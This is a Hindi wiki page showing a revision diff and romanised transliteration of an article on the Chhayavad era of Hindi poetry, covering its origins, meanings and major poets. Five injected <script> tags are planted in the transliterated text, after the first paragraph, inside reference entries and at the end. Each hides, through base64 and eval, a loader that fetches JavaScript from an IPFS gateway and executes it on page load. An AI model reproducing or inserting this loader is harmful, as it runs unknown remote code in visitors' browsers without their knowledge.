Difference between revisions of "छायावादी युग"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 1: Line 1:
'''छायावादी युग''' ([[1918]]-[[1937]]) प्राय: '[[द्विवेदी युग]]' के बाद के समय को कहा जाता है। इस युग में [[हिन्दी साहित्य]] में गद्य गीतों, भाव तरलता, रहस्यात्मक और मर्मस्पर्शी कल्पना, राष्ट्रीयता और स्वतंत्र चिन्तन आदि का समावेश होता चला गया। सन [[1916]] ई. के आस-पास [[हिन्दी]] में कल्पनापूर्ण, स्वच्छंद और भावुकता की एक लहर उमड़ पड़ी। [[भाषा]], भाव, शैली, [[छंद]], [[अलंकार]] इन सब दृष्टियों से पुरानी [[कविता]] से इसका कोई मेल नहीं था। आलोचकों ने इसे 'छायावाद' या 'छायावादी कविता' का नाम दिया।
+
'''छायावादी युग''' ([[1918]]-[[1937]]) प्राय: '[[द्विवेदी युग]]' के बाद के समय को कहा जाता है। 'द्विवेदी युग' की प्रतिक्रिया का परिणाम ही 'छायावाद' है। इस युग में [[हिन्दी साहित्य]] में गद्य गीतों, भाव तरलता, रहस्यात्मक और मर्मस्पर्शी कल्पना, राष्ट्रीयता और स्वतंत्र चिन्तन आदि का समावेश होता चला गया। सन [[1916]] ई. के आस-पास [[हिन्दी]] में कल्पनापूर्ण, स्वच्छंद और भावुकता की एक लहर उमड़ पड़ी। [[भाषा]], भाव, शैली, [[छंद]], [[अलंकार]] इन सब दृष्टियों से पुरानी [[कविता]] से इसका कोई मेल नहीं था। आलोचकों ने इसे 'छायावाद' या 'छायावादी कविता' का नाम दिया।
 
{{tocright}}
 
{{tocright}}
 
==प्रारम्भ==
 
==प्रारम्भ==
 
'छायावाद' का प्रारम्भ सामान्यतः 1918 ई. के आसपास से माना जाता है। तत्कालीन पत्र-पत्रिकाओं से पता चलता है कि [[1920]] तक छायावाद संज्ञा का प्रचलन हो चुका था। मुकुटधर पांडेय ने 1920 की [[जुलाई]], [[सितंबर]], [[नवंबर]] और [[दिसंबर]] की 'श्रीशारदा' ([[जबलपुर]]) में 'हिन्दी में छायावाद' नामक शीर्षक से चार निबंधों की एक लेखमाला छपवाई थी। जब तक किसी प्राचीनतर सामग्री का पता नहीं चलता, इसी को छायावाद-संबंधी सर्वप्रथम [[निबंध]] कहा जा सकता है। हिन्दी में उसका नितांत अभाव देखकर मुकुटधर जी ने इधर-उधर की कुछ टीका-टिप्पणियों के सहारे वह निबंध प्रस्तुत किया था। इससे स्पष्ट है कि उस निबंध से पहले भी छायावाद पर कुछ टीका-टिप्पणियाँ हो चुकी थीं। लेखमाला का प्रथम निबंध 'कवि स्वातंत्र्य' में मुकुटधर जी ने रीति-ग्रंथों की परतंत्रता से मुक्त होकर कविता में व्यक्तिव तथा भाव भाषा छंद प्रकाशन-रीति आदि में मौलिकता की आवश्यकता पर जोर दिया है। दूसरा निबंध 'छायावाद क्या है?' सबसे महत्त्वपूर्ण है। आरंभ में ही लेखक कहता है- "[[अंग्रेज़ी]] या किसी पाश्चात्य साहित्य अथवा बंग साहित्य की वर्तमान स्थिति की कुछ भी जानकारी रखने वाले तो सुनते ही समझ जाएँगे कि यह शब्द मिस्टिसिज्म’ के लिए आया है फिर भी छायावाद एक ऐसी मायामय सूक्ष्म वस्तु है कि शब्दों द्वारा इसका ठीक-ठीक वर्णन करना असंभव है, क्योंकि ऐसी रचनाओं में शब्द अपने स्वाभाविक मूल्य को खोकर सांकेतिक चिह्न मात्र हुआ करते हैं।"<ref>{{cite web |url=http://pustak.org/bs/home.php?bookid=3170|title=छायावाद|accessmonthday=01 अक्टूबर|accessyear=2013 |last= |first= |authorlink= |format= |publisher= |language=हिन्दी}}</ref>
 
'छायावाद' का प्रारम्भ सामान्यतः 1918 ई. के आसपास से माना जाता है। तत्कालीन पत्र-पत्रिकाओं से पता चलता है कि [[1920]] तक छायावाद संज्ञा का प्रचलन हो चुका था। मुकुटधर पांडेय ने 1920 की [[जुलाई]], [[सितंबर]], [[नवंबर]] और [[दिसंबर]] की 'श्रीशारदा' ([[जबलपुर]]) में 'हिन्दी में छायावाद' नामक शीर्षक से चार निबंधों की एक लेखमाला छपवाई थी। जब तक किसी प्राचीनतर सामग्री का पता नहीं चलता, इसी को छायावाद-संबंधी सर्वप्रथम [[निबंध]] कहा जा सकता है। हिन्दी में उसका नितांत अभाव देखकर मुकुटधर जी ने इधर-उधर की कुछ टीका-टिप्पणियों के सहारे वह निबंध प्रस्तुत किया था। इससे स्पष्ट है कि उस निबंध से पहले भी छायावाद पर कुछ टीका-टिप्पणियाँ हो चुकी थीं। लेखमाला का प्रथम निबंध 'कवि स्वातंत्र्य' में मुकुटधर जी ने रीति-ग्रंथों की परतंत्रता से मुक्त होकर कविता में व्यक्तिव तथा भाव भाषा छंद प्रकाशन-रीति आदि में मौलिकता की आवश्यकता पर जोर दिया है। दूसरा निबंध 'छायावाद क्या है?' सबसे महत्त्वपूर्ण है। आरंभ में ही लेखक कहता है- "[[अंग्रेज़ी]] या किसी पाश्चात्य साहित्य अथवा बंग साहित्य की वर्तमान स्थिति की कुछ भी जानकारी रखने वाले तो सुनते ही समझ जाएँगे कि यह शब्द मिस्टिसिज्म’ के लिए आया है फिर भी छायावाद एक ऐसी मायामय सूक्ष्म वस्तु है कि शब्दों द्वारा इसका ठीक-ठीक वर्णन करना असंभव है, क्योंकि ऐसी रचनाओं में शब्द अपने स्वाभाविक मूल्य को खोकर सांकेतिक चिह्न मात्र हुआ करते हैं।"<ref>{{cite web |url=http://pustak.org/bs/home.php?bookid=3170|title=छायावाद|accessmonthday=01 अक्टूबर|accessyear=2013 |last= |first= |authorlink= |format= |publisher= |language=हिन्दी}}</ref>
==छायावादी कविता==
+
=='छायावाद' शब्द का प्रयोग==
आधुनिक हिन्दी कविता की सर्वश्रेष्ठ उपलब्धि छायावादी काल की कविता में मिलती है। लाक्षणिकता, चित्रमयता, नूतन प्रतीक विधान, व्यंग्यात्मकता, मधुरता तथा सरसता आदि गुणों के कारण छायावादी कविता ने धीरे-धीरे अपना एक प्रशंसक वर्ग खड़ा कर दिया। मुकुटधर पांडेय ने सर्वप्रथम 'छायावाद' शब्द का प्रयोग किया था। शब्द चयन और कोमलकांत पदावली के कारण 'इतिवृत्तात्मक'<ref>[[महाकाव्य]] और प्रबंध काव्य, जिनमें किसी कथा का वर्णन होता है।</ref> युग की खुरदरी [[खड़ी बोली]] सौंदर्य, प्रेम और वेदना के गहन भावों को वहन करने योग्य बनी। हिन्दी कविता के अंतरंग और बहिरंग में एकदम परिवर्तन हो गया। वस्तु निरूपण के स्थान पर अनुभूति निरूपण को प्रमुखता मिली। प्रकृति का प्राणमय प्रदेश कविता में आया।
+
'छायावाद' शब्द का प्रयोग दो अर्थों में समझना चाहिए-
====मुख्य साहित्यकार====
+
*एक तो रहस्यवाद के अर्थ में, जहाँ उसका संबंध काव्यवस्तु से होता है अर्थात् जहाँ [[कवि]] उस अनंत और अज्ञात प्रियतम को आलंबन बनाकर अत्यंत चित्रमयी भाषा में प्रेम की अनेक प्रकार से व्यंजना करता है। रहस्यवाद के अंतर्भूत रचनाएँ पहुँचे हुए पुराने संतों या साधकों की उसी वाणी के अनुकरण पर होती हैं, जो तुरीयावस्था या समाधि दशा में नाना रूपकों के रूप में उपलब्ध आध्यात्मिक ज्ञान का आभास देती हुई मानी जाती थी। इस रूपात्मक आभास को [[यूरोप]] में 'छाया'<ref>फैंटसमाटा</ref> कहते थे। इसी से [[बंगाल]] में '[[ब्रह्मसमाज]]' के बीच उक्त वाणी के अनुकरण पर जो आध्यात्मिक गीत या भजन बनते थे, वे 'छायावाद' कहलाने लगे। धीरे-धीरे यह शब्द धार्मिक क्षेत्र से वहाँ के [[साहित्य]] क्षेत्र में आया और फिर रवींद्र बाबू की धूम मचने पर [[हिन्दी]] के साहित्य क्षेत्र में भी प्रकट हुआ।
छायावादी युग के प्रमुख साहित्यकार हैं-
+
*'छायावाद' शब्द का दूसरा प्रयोग काव्य शैली या पद्ध तिविशेष के व्यापक अर्थ में है। सन [[1885]] में [[फ़्राँस]] में रहस्यवादी कवियों का एक दल खड़ा हुआ, जो प्रतीकवाद कहलाया। वे अपनी रचनाओं में प्रस्तुतों के स्थान पर अधिकतर अप्रस्तुत प्रतीकों को लेकर चलते थे। इसी से उनकी शैली की ओर लक्ष्य करके 'प्रतीकवाद' शब्द का व्यवहार होने लगा। आध्यात्मिक या ईश्वर प्रेम संबंधी कविताओं के अतिरिक्त और सब प्रकार की कविताओं के लिए भी प्रतीक शैली की ओर वहाँ प्रवृत्ति रही। हिन्दी में 'छायावाद' शब्द का जो व्यापक अर्थ में, रहस्यवादी रचनाओं के अतिरिक्त और प्रकार की रचनाओं के संबंध में भी, ग्रहण हुआ, वह इसी प्रतीक शैली के अर्थ में। छायावाद का सामान्यत: अर्थ हुआ "प्रस्तुत के स्थान पर उसकी व्यंजना करने वाली छाया के रूप में अप्रस्तुत का कथन"। इस शैली के भीतर किसी वस्तु या विषय का वर्णन किया जा सकता है।<ref>{{cite web |url=http://www.hindisamay.com/Alochana/shukl%20granthavali5/itihas%20shukl14a.htm|title=छायावाद|accessmonthday=01 अक्टूबर|accessyear=2013 |last= |first= |authorlink= |format= |publisher= |language=हिन्दी}}</ref>
 +
==मुख्य साहित्यकार==
 +
'छायावाद' का केवल पहला अर्थात मूल अर्थ लेकर तो हिन्दी काव्य क्षेत्र में चलने वाली [[महादेवी वर्मा]] ही हैं। [[जयशंकर प्रसाद]], [[सुमित्रानन्दन पन्त]] और [[सूर्यकांत त्रिपाठी 'निराला']] इत्यादि और सब कवि प्रतीक पद्धति या चित्रभाषा शैली की दृष्टि से ही छायावादी कहलाए। छायावादी युग के प्रमुख साहित्यकार हैं-
 
#[[रायकृष्ण दास]]
 
#[[रायकृष्ण दास]]
 
#[[वियोगी हरि]]
 
#[[वियोगी हरि]]
Line 19: Line 21:
 
#[[पदुमलाल पुन्नालाल बख्शी]]
 
#[[पदुमलाल पुन्नालाल बख्शी]]
 
#[[बाबू गुलाबराय]]
 
#[[बाबू गुलाबराय]]
 +
==कविता==
 +
आधुनिक हिन्दी कविता की सर्वश्रेष्ठ उपलब्धि छायावादी काल की कविता में मिलती है। लाक्षणिकता, चित्रमयता, नूतन प्रतीक विधान, व्यंग्यात्मकता, मधुरता तथा सरसता आदि गुणों के कारण छायावादी कविता ने धीरे-धीरे अपना एक प्रशंसक वर्ग खड़ा कर दिया। मुकुटधर पांडेय ने सर्वप्रथम 'छायावाद' शब्द का प्रयोग किया था। शब्द चयन और कोमलकांत पदावली के कारण 'इतिवृत्तात्मक'<ref>[[महाकाव्य]] और प्रबंध काव्य, जिनमें किसी कथा का वर्णन होता है।</ref> युग की खुरदरी [[खड़ी बोली]] सौंदर्य, प्रेम और वेदना के गहन भावों को वहन करने योग्य बनी। हिन्दी कविता के अंतरंग और बहिरंग में एकदम परिवर्तन हो गया। वस्तु निरूपण के स्थान पर अनुभूति निरूपण को प्रमुखता मिली। प्रकृति का प्राणमय प्रदेश कविता में आया।
  
 +
'द्विवेदी युग' में राष्ट्रीयता के प्रबल स्वर में प्रेम और सौन्दर्य की कोमल भावनाएँ दब-सी गयी थीं। इन सरस कोमल मनोवृतियों को व्यक्त करने के लिए कवि-हृदय विद्रोह कर उठा। [[हृदय]] की अनुभूतियों तथा दार्शनिक विचारों की मार्मिक अभिव्यक्ति के परिणामस्वरूप ही 'छायावाद' का जन्म हुआ। छायावाद काव्यधारा ने हिंदी को शुष्क प्रचार से बचाया। हिंदी की खड़ी बोली की कविता को सौन्दर्य और सरसता प्रदान की। छायावाद ने [[हिन्दी]] को [[जयशंकर प्रसाद]], [[सुमित्रानन्दन पन्त]] और [[सूर्यकांत त्रिपाठी 'निराला']] जैसे महाकवि दिए। '[[पल्लव -सुमित्रानन्दन पंत|पल्लव]]', '[[कामायनी -प्रसाद|कामायनी]]' और 'राम की शक्तिपूजा' छायावाद की महान उपलब्धि हैं।<ref>{{cite web |url=http://saahityaalochan.blogspot.in/2010/04/blog-post.html|title=छायावाद- राष्ट्रवाद का सांस्कृतिक और भावनात्मक दौर|accessmonthday=01 अक्टूबर|accessyear=2013 |last= |first= |authorlink= |format= |publisher= |language=हिन्दी}}</ref>
  
  

Revision as of 07:31, 1 October 2013

chhayavadi yug (1918-1937) pray: 'dvivedi yug' ke bad ke samay ko kaha jata hai. 'dvivedi yug' ki pratikriya ka parinam hi 'chhayavad' hai. is yug mean hindi sahity mean gady gitoan, bhav taralata, rahasyatmak aur marmasparshi kalpana, rashtriyata aur svatantr chintan adi ka samavesh hota chala gaya. san 1916 ee. ke as-pas hindi mean kalpanapoorn, svachchhand aur bhavukata ki ek lahar um d p di. bhasha, bhav, shaili, chhand, alankar in sab drishtiyoan se purani kavita se isaka koee mel nahian tha. alochakoan ne ise 'chhayavad' ya 'chhayavadi kavita' ka nam diya.

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

prarambh

'chhayavad' ka prarambh samanyatah 1918 ee. ke asapas se mana jata hai. tatkalin patr-patrikaoan se pata chalata hai ki 1920 tak chhayavad sanjna ka prachalan ho chuka tha. mukutadhar paandey ne 1920 ki julaee, sitanbar, navanbar aur disanbar ki 'shrisharada' (jabalapur) mean 'hindi mean chhayavad' namak shirshak se char nibandhoan ki ek lekhamala chhapavaee thi. jab tak kisi prachinatar samagri ka pata nahian chalata, isi ko chhayavad-sanbandhi sarvapratham nibandh kaha ja sakata hai. hindi mean usaka nitaant abhav dekhakar mukutadhar ji ne idhar-udhar ki kuchh tika-tippaniyoan ke sahare vah nibandh prastut kiya tha. isase spasht hai ki us nibandh se pahale bhi chhayavad par kuchh tika-tippaniyaan ho chuki thian. lekhamala ka pratham nibandh 'kavi svatantry' mean mukutadhar ji ne riti-granthoan ki paratantrata se mukt hokar kavita mean vyaktiv tatha bhav bhasha chhand prakashan-riti adi mean maulikata ki avashyakata par jor diya hai. doosara nibandh 'chhayavad kya hai?' sabase mahattvapoorn hai. aranbh mean hi lekhak kahata hai- "aangrezi ya kisi pashchaty sahity athava bang sahity ki vartaman sthiti ki kuchh bhi janakari rakhane vale to sunate hi samajh jaeange ki yah shabd mistisijm’ ke lie aya hai phir bhi chhayavad ek aisi mayamay sookshm vastu hai ki shabdoan dvara isaka thik-thik varnan karana asanbhav hai, kyoanki aisi rachanaoan mean shabd apane svabhavik mooly ko khokar saanketik chihn matr hua karate haian."[1]

'chhayavad' shabd ka prayog

'chhayavad' shabd ka prayog do arthoan mean samajhana chahie-

  • ek to rahasyavad ke arth mean, jahaan usaka sanbandh kavyavastu se hota hai arthath jahaan kavi us anant aur ajnat priyatam ko alanban banakar atyant chitramayi bhasha mean prem ki anek prakar se vyanjana karata hai. rahasyavad ke aantarbhoot rachanaean pahuanche hue purane santoan ya sadhakoan ki usi vani ke anukaran par hoti haian, jo turiyavastha ya samadhi dasha mean nana roopakoan ke roop mean upalabdh adhyatmik jnan ka abhas deti huee mani jati thi. is roopatmak abhas ko yoorop mean 'chhaya'[2] kahate the. isi se bangal mean 'brahmasamaj' ke bich ukt vani ke anukaran par jo adhyatmik git ya bhajan banate the, ve 'chhayavad' kahalane lage. dhire-dhire yah shabd dharmik kshetr se vahaan ke sahity kshetr mean aya aur phir raviandr baboo ki dhoom machane par hindi ke sahity kshetr mean bhi prakat hua.
  • 'chhayavad' shabd ka doosara prayog kavy shaili ya paddh tivishesh ke vyapak arth mean hai. san 1885 mean fraans mean rahasyavadi kaviyoan ka ek dal kh da hua, jo pratikavad kahalaya. ve apani rachanaoan mean prastutoan ke sthan par adhikatar aprastut pratikoan ko lekar chalate the. isi se unaki shaili ki or lakshy karake 'pratikavad' shabd ka vyavahar hone laga. adhyatmik ya eeshvar prem sanbandhi kavitaoan ke atirikt aur sab prakar ki kavitaoan ke lie bhi pratik shaili ki or vahaan pravritti rahi. hindi mean 'chhayavad' shabd ka jo vyapak arth mean, rahasyavadi rachanaoan ke atirikt aur prakar ki rachanaoan ke sanbandh mean bhi, grahan hua, vah isi pratik shaili ke arth mean. chhayavad ka samanyat: arth hua "prastut ke sthan par usaki vyanjana karane vali chhaya ke roop mean aprastut ka kathan". is shaili ke bhitar kisi vastu ya vishay ka varnan kiya ja sakata hai.[3]

mukhy sahityakar

'chhayavad' ka keval pahala arthat mool arth lekar to hindi kavy kshetr mean chalane vali mahadevi varma hi haian. jayashankar prasad, sumitranandan pant aur sooryakaant tripathi 'nirala' ityadi aur sab kavi pratik paddhati ya chitrabhasha shaili ki drishti se hi chhayavadi kahalae. chhayavadi yug ke pramukh sahityakar haian-

  1. raykrishna das
  2. viyogi hari
  3. d aau. raghuvir sahay
  4. makhanalal chaturvedi
  5. jayashankar prasad
  6. mahadevi varma
  7. nand dulare vajapeyi
  8. d aau. shivapoojan sahay
  9. sooryakant tripathi nirala
  10. ramachandr shukl
  11. padumalal punnalal bakhshi
  12. baboo gulabaray

kavita

adhunik hindi kavita ki sarvashreshth upalabdhi chhayavadi kal ki kavita mean milati hai. lakshanikata, chitramayata, nootan pratik vidhan, vyangyatmakata, madhurata tatha sarasata adi gunoan ke karan chhayavadi kavita ne dhire-dhire apana ek prashansak varg kh da kar diya. mukutadhar paandey ne sarvapratham 'chhayavad' shabd ka prayog kiya tha. shabd chayan aur komalakaant padavali ke karan 'itivrittatmak'[4] yug ki khuradari kh di boli sauandary, prem aur vedana ke gahan bhavoan ko vahan karane yogy bani. hindi kavita ke aantarang aur bahirang mean ekadam parivartan ho gaya. vastu niroopan ke sthan par anubhooti niroopan ko pramukhata mili. prakriti ka pranamay pradesh kavita mean aya.

'dvivedi yug' mean rashtriyata ke prabal svar mean prem aur saundary ki komal bhavanaean dab-si gayi thian. in saras komal manovritiyoan ko vyakt karane ke lie kavi-hriday vidroh kar utha. hriday ki anubhootiyoan tatha darshanik vicharoan ki marmik abhivyakti ke parinamasvaroop hi 'chhayavad' ka janm hua. chhayavad kavyadhara ne hiandi ko shushk prachar se bachaya. hiandi ki kh di boli ki kavita ko saundary aur sarasata pradan ki. chhayavad ne hindi ko jayashankar prasad, sumitranandan pant aur sooryakaant tripathi 'nirala' jaise mahakavi die. 'pallav', 'kamayani' aur 'ram ki shaktipooja' chhayavad ki mahan upalabdhi haian.[5]


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

  1. chhayavad (hindi). . abhigaman tithi: 01 aktoobar, 2013.<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>
  2. phaiantasamata
  3. chhayavad (hindi). . abhigaman tithi: 01 aktoobar, 2013.<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>
  4. mahakavy aur prabandh kavy, jinamean kisi katha ka varnan hota hai.
  5. chhayavad- rashtravad ka saanskritik aur bhavanatmak daur (hindi). . abhigaman tithi: 01 aktoobar, 2013.<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>